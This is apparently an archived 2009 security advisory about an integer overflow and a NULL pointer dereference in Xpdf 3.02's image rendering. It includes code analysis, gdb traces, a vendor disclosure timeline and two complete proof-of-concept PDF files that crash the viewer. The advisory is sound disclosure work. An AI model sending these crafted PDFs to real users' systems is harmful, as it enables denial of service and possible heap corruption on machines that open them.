AOH :: HP Unsorted X :: BT-21841.HTM

Xpdf - Integer overflow which causes heap overflow and NULL pointer derefernce.



Xpdf - Integer overflow which causes heap overflow and NULL pointer derefernce.
Xpdf - Integer overflow which causes heap overflow and NULL pointer derefernce.



Name:                      Xpdf - Integer overflow which causes heap overflow and NULL pointer derefernce=0D
Author: Adam Zabrocki / HISPASEC ( or )=0D 
Date:                      July 06, 2009=0D
=0D
=0D
   Issue:=0D
=0D
Xpdf allows local and remote attackers to overflow buffer on heap via integer overflow vulnerability.=0D
Xpdf is prone to NULL pointer dereference attack.=0D
=0D
=0D
   Description:=0D
=0D
Xpdf is an open-source viewer for Portable Document Format (PDF) files. Xpdf project also includes=0D
a PDF text extractor, PDF-to-PostScript converter, and various other utilities. Xpdf runs under=0D
the X Window System on UNIX, VMS, and OS/2. The non-X components (pdftops, pdftotext, etc.) also=0D
run on Win32 systems and should run on pretty much any system with a decent C++ compiler.=0D
Xpdf is designed to be small and efficient. It can use Type 1, TrueType, or standard X fonts. =0D
=0D
=0D
   Details:=0D
=0D
=0D
Let's look in code:=0D
=0D
"./goo/gmem.cc"=0D
void *gmalloc(int size) GMEM_EXCEP {=0D
#ifdef DEBUG_MEM =0D
   ...=0D
#else =0D
  void *p;=0D
=0D
  if (size < 0) {=0D
#if USE_EXCEPTIONS =0D
   ...=0D
#else =0D
    fprintf(stderr, "Invalid memory allocation size\n");=0D
    exit(1);=0D
#endif =0D
  }=0D
  if (size == 0) {=0D
    return NULL;=0D
  }=0D
  if (!(p = malloc(size))) {=0D
#if USE_EXCEPTIONS =0D
   ...=0D
#else =0D
    fprintf(stderr, "Out of memory\n");=0D
    exit(1);=0D
#endif =0D
  }=0D
  return p;=0D
#endif =0D
}=0D
=0D
Ok. So if we pass negative value to gmalloc() than xpdf finish work via exit() call=0D
and print to stderr "Invalid memory allocation size\n". If we pass 0 (zero) value=0D
than function return NULL. In other cases there will be normal call to malloc() func.=0D
=0D
Ok so let's look further.=0D
=0D
"./splash/Splash.cc"=0D
SplashError Splash::drawImage(SplashImageSource src, void *srcData,=0D
                              SplashColorMode srcMode, GBool srcAlpha,=0D
                              int w, int h, SplashCoord *mat) {=0D
...=0D
...=0D
  SplashClipResult clipRes, clipRes2;=0D
  int yp, yq, yt, yStep, lastYStep;=0D
  int xp, xq, xt, xStep, xSrc;=0D
...=0D
  SplashColorPtr colorBuf, p;=0D
...=0D
#if SPLASH_CMYK =0D
  int pixAcc0, pixAcc1, pixAcc2, pixAcc3;=0D
#else =0D
  int pixAcc0, pixAcc1, pixAcc2;=0D
#endif =0D
...=0D
  int nComps, n, m, i, j;=0D
=0D
...=0D
  // check color modes=0D
  ok = gFalse; // make gcc happy=0D
  nComps = 0; // make gcc happy=0D
  switch (bitmap->mode) {=0D
  case splashModeMono1:=0D
  case splashModeMono8:=0D
    ok = srcMode == splashModeMono8;=0D
    nComps = 1;=0D
    break;=0D
  case splashModeRGB8:=0D
    ok = srcMode == splashModeRGB8;=0D
    nComps = 3;=0D
    break;=0D
  case splashModeBGR8:=0D
    ok = srcMode == splashModeBGR8;=0D
    nComps = 3;=0D
    break;=0D
#if SPLASH_CMYK =0D
  case splashModeCMYK8:=0D
    ok = srcMode == splashModeCMYK8;=0D
    nComps = 4;=0D
    break;=0D
#endif =0D
  }=0D
  if (!ok) {=0D
    return splashErrModeMismatch;=0D
  }=0D
...=0D
...=0D
=0D
  // compute Bresenham parameters for x and y scaling=0D
  yp = h / scaledHeight;=0D
  yq = h % scaledHeight;=0D
  xp = w / scaledWidth;=0D
  xq = w % scaledWidth;=0D
=0D
  colorBuf = (SplashColorPtr)gmalloc((yp + 1) * w * nComps);                <- [1] !!!=0D
  if (srcAlpha) {=0D
    alphaBuf = (Guchar *)gmalloc((yp + 1) * w);=0D
  } else {=0D
    alphaBuf = NULL;=0D
  }=0D
=0D
  pixAcc0 = pixAcc1 = pixAcc2 = 0; // make gcc happy=0D
=0D
...=0D
...=0D
=0D
  if (srcAlpha) {=0D
=0D
...=0D
=0D
...=0D
  } else {=0D
=0D
    // init y scale Bresenham=0D
    yt = 0;=0D
    lastYStep = 1;=0D
=0D
    for (y = 0; y < scaledHeight; ++y) {=0D
=0D
      // y scale Bresenham=0D
      yStep = yp;=0D
      yt += yq;=0D
      if (yt >= scaledHeight) {=0D
        yt -= scaledHeight;=0D
        ++yStep;=0D
      }=0D
      =0D
      // read row(s) from image=0D
      n = (yp > 0) ? yStep : lastYStep;=0D
      if (n > 0) {=0D
        p = colorBuf;=0D
        for (i = 0; i < n; ++i) {=0D
          (*src)(srcData, p, NULL);                 <- [!!]  !!!=0D
          p += w * nComps;=0D
        }=0D
      }=0D
=0D
...=0D
=0D
...=0D
=0D
      switch (srcMode) {=0D
=0D
...=0D
...=0D
=0D
      case splashModeRGB8:=0D
      case splashModeBGR8:=0D
        for (x = 0; x < scaledWidth; ++x) {=0D
=0D
          // x scale Bresenham=0D
          xStep = xp;=0D
          xt += xq;=0D
          if (xt >= scaledWidth) {=0D
            xt -= scaledWidth;=0D
            ++xStep;=0D
          }=0D
=0D
...=0D
...=0D
=0D
          // compute the filtered pixel at (x,y) after the x and y scaling=0D
          // operations=0D
          m = xStep > 0 ? xStep : 1;=0D
          p = colorBuf + xSrc * 3;               <-             [2] !!!=0D
          pixAcc0 = pixAcc1 = pixAcc2 = 0;=0D
          for (i = 0; i < n; ++i) {=0D
            for (j = 0; j < m; ++j) {=0D
              pixAcc0 += *p++;                   <-             [3] !!!=0D
              pixAcc1 += *p++;=0D
              pixAcc2 += *p++;=0D
            }=0D
            p += 3 * (w - m);=0D
          }=0D
=0D
...=0D
...=0D
=0D
...=0D
...=0D
}=0D
=0D
=0D
We immediately control variable "w" and "h". So if we set variable "w" to value zero (0).=0D
After that call to gmalloc (in [1]) will return NULL. There is no check what value was returned!=0D
So in [2] we have p = NULL + xSrc*3, xSrc we can set to 0 (zero) too. So in fact we can set "p"=0D
to NULL value. In [3] we have NULL pointer dereference!=0D
=0D
Ok let's look for other scenario. What will happen if variable "w" have BIG value? Let's look:=0D
=0D
(yp + 1) * w * nComps=0D
=0D
"w" we can control immediately, "nComps" have some static value and "yp" we can controle indirectly=0D
because:=0D
=0D
  yp = h / scaledHeight;=0D
=0D
"h" we control once again immediately! So in fact we can do integer overflow and allocate less memory=0D
than it should be. For example:=0D
=0D
h = 2000000000=0D
w = 1102=0D
nComps = 3=0D
yp / scaledHeight = 15873015, for standard scaledHeight = 126=0D
=0D
so it should be => (15873015+1)*1102*3 = 15873016*1102*3 = 52476190896=0D
but in fact after integer overflow it is:=0D
yp[15873015]+1)*w[1102]*nComps[3] = 936583344=0D
=0D
So it is too little :)=0D
=0D
In  this scenario after call to gmalloc() program will go after some instruction to code in [!!].=0D
in fact this is call to some pointer which redirect us to function...=0D
=0D
=0D
"xpdf/SplashOutputDev.cc"=0D
GBool SplashOutputDev::imageSrc(void *data, SplashColorPtr colorLine,=0D
                                Guchar *alphaLine) {=0D
  SplashOutImageData *imgData = (SplashOutImageData *)data;=0D
...=0D
  SplashColorPtr q, col;=0D
...=0D
  int nComps, x;=0D
=0D
...=0D
=0D
  if (imgData->lookup) {=0D
    switch (imgData->colorMode) {=0D
...=0D
...=0D
    case splashModeRGB8:=0D
    case splashModeBGR8:=0D
      for (x = 0, p = imgData->imgStr->getLine(), q = colorLine;=0D
           x < imgData->width;=0D
           ++x, p += nComps) {=0D
        imgData->colorMap->getRGB(p, &rgb);=0D
        *q++ = colToByte(rgb.r);=0D
        *q++ = colToByte(rgb.g);=0D
        *q++ = colToByte(rgb.b);=0D
      }=0D
      break;=0D
...=0D
...=0D
}=0D
=0D
And here is overflow! We have too little allocated memory but program don't know about it=0D
and try to convert colors and write in this memory by call:=0D
=0D
        *q++ = colToByte(rgb.r);=0D
        *q++ = colToByte(rgb.g);=0D
        *q++ = colToByte(rgb.b);=0D
=0D
and the end of working loop is via this compare:=0D
=0D
	 x < imgData->width;=0D
=0D
So we overflow memory.=0D
=0D
=0D
=0D
=0D
   Proof of concept=0D
=0D
Let's try to do this scenario:=0D
[root@pi3book xpdf-3.02]# xpdf elo.pdf =0D
Error: PDF file is damaged - attempting to reconstruct xref table...=0D
Naruszenie ochrony pamięci=0D
[root@pi3book xpdf-3.02]#=0D
=0D
and gdb output:=0D
=0D
(gdb) bt=0D
#0  0x080c222a in SplashOutputDev::imageSrc (data=0xbfffec84, colorLine=0xb7fe46de '�' ..., alphaLine=0x0) at SplashOutputDev.cc:1848=0D
#1  0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 , srcData=0xbfffec84, =0D
    srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532=0D
#2  0x080c1d1f in SplashOutputDev::drawImage (this=0x81bd0f8, state=0x81f0050, ref=0xbfffeebc, str=0x81f0960, width=1102, height=2000000000, =0D
    colorMap=0x81f8ea0, maskColors=0x0, inlineImg=0) at SplashOutputDev.cc:2048=0D
#3  0x080601d9 in Gfx::doImage (this=0x81e5528, ref=0xbfffeebc, str=0x81f0960, inlineImg=0) at Gfx.cc:3657=0D
#4  0x08066799 in Gfx::opXObject (this=0x81e5528, args=0xbfffef34, numArgs=1) at Gfx.cc:3330=0D
#5  0x080612bd in Gfx::go (this=0x81e5528, topLevel=1) at Gfx.cc:581=0D
#6  0x080615ea in Gfx::display (this=0x81e5528, obj=0xbffff1ac, topLevel=1) at Gfx.cc:553=0D
#7  0x080a55cb in Page::displaySlice (this=0x81df9f0, out=0x81bd0f8, hDPI=90, vDPI=90, rotate=0, useMediaBox=0, crop=1, sliceX=0, sliceY=0, sliceW=744, =0D
    sliceH=1052, printing=0, catalog=0x81de638, abortCheckCbk=0, abortCheckCbkData=0x0) at Page.cc:317=0D
#8  0x080aa485 in PDFCore::needTile (this=0x81bcab8, page=0x81e5468, x=0, y=0) at PDFCore.cc:835=0D
#9  0x080abc77 in PDFCore::update (this=0x81bcab8, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at PDFCore.cc:658=0D
#10 0x080de837 in XPDFCore::update (this=0x81bcab8, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at XPDFCore.cc:285=0D
#11 0x080a6861 in PDFCore::displayPage (this=0xbfffe88c, topPageA=1, zoomA=125, rotateA=0, scrollToTop=1, addToHist=1) at PDFCore.cc:292=0D
#12 0x080ea80a in XPDFViewer (this=0x81a35f8, appA=0x8180298, fileName=0x8182b00, pageA=1, destName=0x0, fullScreen=0, ownerPassword=0x0, userPassword=0x0)=0D
    at XPDFViewer.cc:297=0D
#13 0x080dafe0 in XPDFApp::open (this=0x8180298, fileName=0x8182b00, page=1, ownerPassword=0x0, userPassword=0x0) at XPDFApp.cc:228=0D
#14 0x080edcbb in main (argc=Cannot access memory at address 0x0=0D
) at xpdf.cc:311=0D
(gdb) x/i $eip=0D
0x80c222a <_ZN15SplashOutputDev8imageSrcEPvPhS1_+346>:	mov    %al,0x1(%ebx)=0D
(gdb) i r ebx=0D
ebx            0xb7fe4fff	-1208070145=0D
(gdb) x/x $ebx=0D
0xb7fe4fff:	Cannot access memory at address 0xb7fe4fff=0D
(gdb) print q=0D
$1 = (Guchar *) 0xb7fe4fff "�" 
=0D (gdb) print x=0D $2 = 780=0D (gdb) print ((SplashOutImageData *)data)->width=0D $3 = 1102=0D (gdb) up=0D #1 0x080fedc0 in Splash::drawImage (this=0x81e5878, src=0x80c20d0 , srcData=0xbfffec84, =0D srcMode=splashModeRGB8, srcAlpha=0, w=1102, h=2000000000, mat=0xbfffec50) at Splash.cc:2532=0D 2532 (*src)(srcData, p, NULL);=0D (gdb) print colorBuf =0D $4 = (=0D SplashColorPtr) 0x7ffae008 "\204��a\210�a\210�a\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210�`\210"...=0D (gdb) print w=0D $5 = 1102=0D (gdb) print h=0D $6 = 2000000000=0D (gdb) print nComps =0D $7 = 3=0D (gdb) list=0D 2527 // read row(s) from image=0D 2528 n = (yp > 0) ? yStep : lastYStep;=0D 2529 if (n > 0) {=0D 2530 p = colorBuf;=0D 2531 for (i = 0; i < n; ++i) {=0D 2532 (*src)(srcData, p, NULL);=0D 2533 p += w * nComps;=0D 2534 }=0D 2535 }=0D 2536 lastYStep = yStep;=0D (gdb) print n=0D $8 = 15873015=0D (gdb) print p=0D $9 = (Guchar *) 0xb7fe46de '�' ...=0D (gdb) =0D =0D So it is exactly what we analyze source :) Look now what will happen when variable "w" have value 0 (zero) - in fact=0D now we will have NULL pointer dereference. Let's look:=0D =0D [root@pi3book xpdf-3.02]# xpdf jajo.pdf =0D Error: PDF file is damaged - attempting to reconstruct xref table...=0D Naruszenie ochrony pamięci (core dumped)=0D [root@pi3book xpdf-3.02]# =0D =0D and gdb output:=0D =0D (gdb) bt=0D #0 Splash::drawImage (this=0x81e58e0, src=0x80c20d0 , srcData=0xbfffec84, =0D srcMode=splashModeRGB8, srcAlpha=0, w=0, h=2000000000, mat=0xbfffec50) at Splash.cc:2667=0D #1 0x080c1d1f in SplashOutputDev::drawImage (this=0x81bd100, state=0x81f0090, ref=0xbfffeebc, str=0x81f09c0, width=0, height=2000000000, =0D colorMap=0x81f8f00, maskColors=0x0, inlineImg=0) at SplashOutputDev.cc:2048=0D #2 0x080601d9 in Gfx::doImage (this=0x81e54c8, ref=0xbfffeebc, str=0x81f09c0, inlineImg=0) at Gfx.cc:3657=0D #3 0x08066799 in Gfx::opXObject (this=0x81e54c8, args=0xbfffef34, numArgs=1) at Gfx.cc:3330=0D #4 0x080612bd in Gfx::go (this=0x81e54c8, topLevel=1) at Gfx.cc:581=0D #5 0x080615ea in Gfx::display (this=0x81e54c8, obj=0xbffff1ac, topLevel=1) at Gfx.cc:553=0D #6 0x080a55cb in Page::displaySlice (this=0x81dfa08, out=0x81bd100, hDPI=90, vDPI=90, rotate=0, useMediaBox=0, crop=1, sliceX=0, sliceY=0, sliceW=744, =0D sliceH=1052, printing=0, catalog=0x81de718, abortCheckCbk=0, abortCheckCbkData=0x0) at Page.cc:317=0D #7 0x080aa485 in PDFCore::needTile (this=0x81bcac0, page=0x81e5408, x=0, y=0) at PDFCore.cc:835=0D #8 0x080abc77 in PDFCore::update (this=0x81bcac0, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at PDFCore.cc:658=0D #9 0x080de837 in XPDFCore::update (this=0x81bcac0, topPageA=1, scrollXA=0, scrollYA=0, zoomA=125, rotateA=0, force=1, addToHist=1) at XPDFCore.cc:285=0D #10 0x080a6861 in PDFCore::displayPage (this=0x0, topPageA=1, zoomA=125, rotateA=0, scrollToTop=1, addToHist=1) at PDFCore.cc:292=0D #11 0x080ea80a in XPDFViewer (this=0x81a35f8, appA=0x8180298, fileName=0x8182b00, pageA=1, destName=0x0, fullScreen=0, ownerPassword=0x0, userPassword=0x0)=0D at XPDFViewer.cc:297=0D #12 0x080dafe0 in XPDFApp::open (this=0x8180298, fileName=0x8182b00, page=1, ownerPassword=0x0, userPassword=0x0) at XPDFApp.cc:228=0D #13 0x080edcbb in main (argc=Cannot access memory at address 0x0=0D ) at xpdf.cc:311=0D (gdb) print w=0D $1 = 0=0D (gdb) print i=0D $2 = 0=0D (gdb) print j=0D $3 = 0=0D (gdb) print n=0D $4 = 15873015=0D (gdb) print m=0D $5 = 1=0D (gdb) print p=0D $6 = (Guchar *) 0x0=0D (gdb) print pixAcc0=0D $7 = 0=0D (gdb) x/i $eip=0D 0x80ff720 <_ZN6Splash9drawImageEPFiPvPhS1_ES0_15SplashColorModeiiiPd+9488>: movzbl (%ebx),%eax=0D (gdb) i r ebx=0D ebx 0x0 0=0D (gdb) x/x $ebx=0D 0x0: Cannot access memory at address 0x0=0D (gdb) =0D =0D That's all. Everything is exacly what we analyse.=0D =0D [1] - NULL pointer dereference:=0D =0D -------------- xpdf-poc-null-pointer-dereference.pdf -------------=0D %PDF-1.3=0D % 'BasicFonts': class PDFDictionary =0D 1 0 obj=0D % The standard fonts dictionary=0D << /F1 2 0 R >>=0D endobj=0D % 'F1': class PDFType1Font =0D 2 0 obj=0D % Font Helvetica=0D << /BaseFont /Helvetica=0D /Encoding /WinAnsiEncoding=0D /Name /F1=0D /Subtype /Type1=0D /Type /Font >>=0D endobj=0D % 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject =0D 3 0 obj=0D << /BitsPerComponent 8=0D /ColorSpace /DeviceRGB=0D /Filter [ /ASCII85Decode=0D /FlateDecode ]=0D /Height 2000000000=0D /Length 61=0D /Subtype /Image=0D /Type /XObject=0D /Width 0 >>=0D stream=0D GarPPGWE%h$j7l8U/endstream=0D =0D endobj=0D % 'Page1': class PDFPage =0D 4 0 obj=0D % Page dictionary=0D << /Contents 8 0 R=0D /MediaBox [ 0=0D 0=0D 595.2756=0D 841.8898 ]=0D /Parent 7 0 R=0D /Resources << /Font 1 0 R=0D /ProcSet [ /PDF=0D /Text=0D /ImageB=0D /ImageC=0D /ImageI ]=0D /XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>=0D /Rotate 0=0D /Trans << >>=0D /Type /Page >>=0D endobj=0D % 'R5': class PDFCatalog =0D 5 0 obj=0D % Document Root=0D << /Outlines 9 0 R=0D /PageMode /UseNone=0D /Pages 7 0 R=0D /Type /Catalog >>=0D endobj=0D % 'R6': class PDFInfo =0D 6 0 obj=0D << /Author (anonymous)=0D /CreationDate (20090525000415)=0D /Keywords ()=0D /Producer (ReportLab http://www.reportlab.com)=0D /Subject (unspecified)=0D /Title (untitled) >>=0D endobj=0D % 'R7': class PDFPages =0D 7 0 obj=0D % page tree=0D << /Count 1=0D /Kids [ 4 0 R ]=0D /Type /Pages >>=0D endobj=0D % 'R8': class PDFStream =0D 8 0 obj=0D % page stream=0D << /Filter [ /ASCII85Decode=0D /FlateDecode ]=0D /Length 137 >>=0D stream=0D endstream=0D">Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964@g>'endstream=0D =0D endobj=0D % 'R9': class PDFOutlines =0D 9 0 obj=0D << /Count 0=0D /Type /Outlines >>=0D endobj=0D xref=0D 0 10=0D 0000000000 65535 f=0D 0000000113 00000 n=0D 0000000209 00000 n=0D 0000000415 00000 n=0D 0000000710 00000 n=0D 0000001052 00000 n=0D 0000001186 00000 n=0D 0000001397 00000 n=0D 0000001502 00000 n=0D 0000001783 00000 n=0D trailer=0D << /ID =0D % ReportLab generated PDF document -- digest (http://www.reportlab.com) =0D [(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b\372\015\305\017\211\022\241\262?\243\347)] =0D =0D /Info 6 0 R=0D /Root 5 0 R=0D /Size 10 >>=0D startxref=0D 1834=0D %%EOF=0D -------------- xpdf-poc-null-pointer-dereference.pdf -------------=0D =0D =0D [2] - Integer overflow:=0D =0D -------------- xpdf-poc-integer-overflow.pdf -------------=0D %PDF-1.3=0D % 'BasicFonts': class PDFDictionary =0D 1 0 obj=0D % The standard fonts dictionary=0D << /F1 2 0 R >>=0D endobj=0D % 'F1': class PDFType1Font =0D 2 0 obj=0D % Font Helvetica=0D << /BaseFont /Helvetica=0D /Encoding /WinAnsiEncoding=0D /Name /F1=0D /Subtype /Type1=0D /Type /Font >>=0D endobj=0D % 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject =0D 3 0 obj=0D << /BitsPerComponent 8=0D /ColorSpace /DeviceRGB=0D /Filter [ /ASCII85Decode=0D /FlateDecode ]=0D /Height 2000000000=0D /Length 61=0D /Subtype /Image=0D /Type /XObject=0D /Width 1102 >>=0D stream=0D GarPPGWE%h$j7l8U/endstream=0D =0D endobj=0D % 'Page1': class PDFPage =0D 4 0 obj=0D % Page dictionary=0D << /Contents 8 0 R=0D /MediaBox [ 0=0D 0=0D 595.2756=0D 841.8898 ]=0D /Parent 7 0 R=0D /Resources << /Font 1 0 R=0D /ProcSet [ /PDF=0D /Text=0D /ImageB=0D /ImageC=0D /ImageI ]=0D /XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>=0D /Rotate 0=0D /Trans << >>=0D /Type /Page >>=0D endobj=0D % 'R5': class PDFCatalog =0D 5 0 obj=0D % Document Root=0D << /Outlines 9 0 R=0D /PageMode /UseNone=0D /Pages 7 0 R=0D /Type /Catalog >>=0D endobj=0D % 'R6': class PDFInfo =0D 6 0 obj=0D << /Author (anonymous)=0D /CreationDate (20090525000415)=0D /Keywords ()=0D /Producer (ReportLab http://www.reportlab.com)=0D /Subject (unspecified)=0D /Title (untitled) >>=0D endobj=0D % 'R7': class PDFPages =0D 7 0 obj=0D % page tree=0D << /Count 1=0D /Kids [ 4 0 R ]=0D /Type /Pages >>=0D endobj=0D % 'R8': class PDFStream =0D 8 0 obj=0D % page stream=0D << /Filter [ /ASCII85Decode=0D /FlateDecode ]=0D /Length 137 >>=0D stream=0D endstream=0D">Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964@g>'endstream=0D =0D endobj=0D % 'R9': class PDFOutlines =0D 9 0 obj=0D << /Count 0=0D /Type /Outlines >>=0D endobj=0D xref=0D 0 10=0D 0000000000 65535 f=0D 0000000113 00000 n=0D 0000000209 00000 n=0D 0000000415 00000 n=0D 0000000710 00000 n=0D 0000001052 00000 n=0D 0000001186 00000 n=0D 0000001397 00000 n=0D 0000001502 00000 n=0D 0000001783 00000 n=0D trailer=0D << /ID =0D % ReportLab generated PDF document -- digest (http://www.reportlab.com) =0D [(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b\372\015\305\017\211\022\241\262?\243\347)] =0D =0D /Info 6 0 R=0D /Root 5 0 R=0D /Size 10 >>=0D startxref=0D 1834=0D %%EOF=0D =0D -------------- xpdf-poc-integer-overflow.pdf -------------=0D =0D =0D Greets=0D =0D Guys from HISPASEC, snoop, thorkill, Piotr Bania, guys from SecurityReason,=0D #lam3rz@IRCNET and #plhack@IRCNET=0D =0D =0D Disclaimer=0D =0D This document and all the information it contains is provided "as is",=0D without any warranty. The author is not responsible for the=0D misuse of the information provided in this advisory. The advisory is=0D provided for educational purposes only.=0D =0D Permission is hereby granted to redistribute this advisory, providing=0D that no changes are made and that the copyright notices and=0D disclaimers remain intact.=0D =0D =0D Ending words...=0D =0D That's all. I test it on version 3.02 with all security patches. Probably all versions=0D are vulnerability. Thanks and Best regards Adam Zabrocki (pi3 / pi3ki31ny).=0D =0D =0D =0D Disclosure Timeline=0D =0D *) 14 October, 2009 - Vendor release patch=0D ...=0D ...=0D *) 27 Jult, 2009 - replay with vendor=0D *) 23 Jult, 2009 - contact with vendor=0D *) 06 July, 2009 - exploit bug and write advisory=0D *) 04 July, 2009 - found bug=0D =0D =0D =0D --=0D http://hispasec.com=0D http://pi3.com.pl=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.